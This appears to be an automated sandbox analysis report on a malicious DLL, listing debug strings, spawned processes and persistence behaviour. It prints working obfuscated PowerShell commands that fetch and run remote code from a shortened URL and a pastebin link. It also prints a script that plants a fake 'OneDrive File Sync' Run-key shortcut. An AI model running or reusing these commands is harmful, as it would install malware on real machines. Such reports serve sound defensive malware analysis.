Source: Binary string: CallSite.Target.pdbz* source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000018.00000002.3196743622.00000223CF913000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb# source: powershell.exe, 00000018.00000002.3188775271.00000223CF58E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2517245546.00000278B4515000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbX source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automationib.pdb source: powershell.exe, 00000008.00000002.2572094402.00000242B23BB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbs source: powershell.exe, 00000008.00000002.2572094402.00000242B2414000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF87E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32x source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F1A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ib.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb91? source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\mscorlib.pdbe source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdb89 source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbI3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb_` source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb source: powershell.exe, 00000007.00000002.3011907494.000002271A12A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbC:\W source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb^ source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbata\ source: powershell.exe, 0000001C.00000002.3255522578.0000025E7DB6C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000018.00000002.3206043710.00000223CF941000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000001C.00000002.3251820933.0000025E7D948000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC60D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 0000001C.00000002.3250944670.0000025E7D907000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdbt source: powershell.exe, 0000000D.00000002.2517245546.00000278B456D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: -C:\Users\Bill Hillman\source\repos\prohashingDLL\x64\Release\prohashingDLL.pdb source: HQsitBLlOv.dll
Source: Binary string: rlib.pdb source: powershell.exe, 00000008.00000002.3043110915.00000242CC666000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb9$M source: powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3038134380.000002271A4B5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.3069004081.00000276F9F75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\Microsoft.PowerShell.Commands.Utility.pdbpdbity.pdbe089Z source: powershell.exe, 00000018.00000002.3192927958.00000223CF610000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2516094783.00000278B4203000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.3196743622.00000223CF86D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DB16000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb!3 source: powershell.exe, 0000000D.00000002.2518172369.00000278B45AC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C35000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3038134380.000002271A470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3255522578.0000025E7DAEF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.3039134768.00000276F9C85000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbH$- source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbrS source: powershell.exe, 00000018.00000002.3196743622.00000223CF8EC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdbjk source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb9dll source: powershell.exe, 0000000D.00000002.2516637962.00000278B42A2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3052251366.00000276F9CE1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb` source: powershell.exe, 00000006.00000002.3081283774.00000276F9F9D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbB source: powershell.exe, 00000008.00000002.3009488482.00000242CC320000.00000004.00000020.00020000.00000000.sdmp
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: HQsitBLlOv.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle h -command sal callit ('iE'+'x'); sal $env:os iWr; calliT(WINDOWS_NT('ti' + 'nyu' + 'rl.c' + 'om/yeykydun') -usebasicparsing)
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: HQsitBLlOv.dllStatic PE information: section name: _RDATA
Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\HQsitBLlOv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD3477B4E0 push FFFFFFE8h; retf 6_2_00007FFD3477B4F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347674FB push ebx; iretd 6_2_00007FFD3476756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD347755AA push eax; iretd 6_2_00007FFD347755DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34776FD9 push eax; iretd 6_2_00007FFD34776FDD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD34837688 push ds; retf 6_2_00007FFD348376A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348368F3 push 5CC00000h; iretd 6_2_00007FFD34836912
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD348379F5 push ss; retf 6_2_00007FFD34837A12
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD347974EB push ebx; iretd 24_2_00007FFD3479756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3479782E pushad ; iretd 24_2_00007FFD3479785D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD3479785E push eax; iretd 24_2_00007FFD3479786D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34856DC3 push edi; iretd 24_2_00007FFD34856DC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34851736 push 00000061h; iretd 24_2_00007FFD348517AB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFD34856EB8 push FFFFFF8Fh; iretd 24_2_00007FFD34856F63

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: attrib.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "OneDrive File Sync" -Value '"C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"' -PropertyType String -Forcemkdir "C:\ProgramData\Microsoft OneDrive\FileSync";$savedbytes = (76,0,0,0,1,20,2,0,0,0,0,0,192,0,0,0,0,0,0,70,171,0,8,0,32,0,0,0,124,37,104,27,210,97,216,1,203,131,156,28,20,3,219,1,124,37,104,27,210,97,216,1,0,16,1,0,0,0,0,0,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,69,1,20,0,31,80,224,79,208,32,234,58,105,16,162,216,8,0,43,48,48,157,25,0,47,67,58,92,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,86,0,49,0,0,0,0,0,23,89,186,133,48,0,87,105,110,100,111,119,115,0,64,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,246,25,0,0,0,0,2,0,0,0,0,0,12,1,0,0,0,0,0,0,0,0,46,238,28,1,87,0,105,0,110,0,100,0,111,0,119,0,115,0,0,0,22,0,90,0,49,0,0,0,0,0,36,89,104,183,16,0,83,121,115,116,101,109,51,50,0,0,66,0,9,0,4,0,239,190,167,84,44,42,41,89,8,186,46,0,0,0,76,95,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,208,173,33,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,0,0,24,0,102,0,50,0,0,16,1,0,167,84,130,42,32,0,102,111,114,102,105,108,101,115,46,101,120,101,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: NULL
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
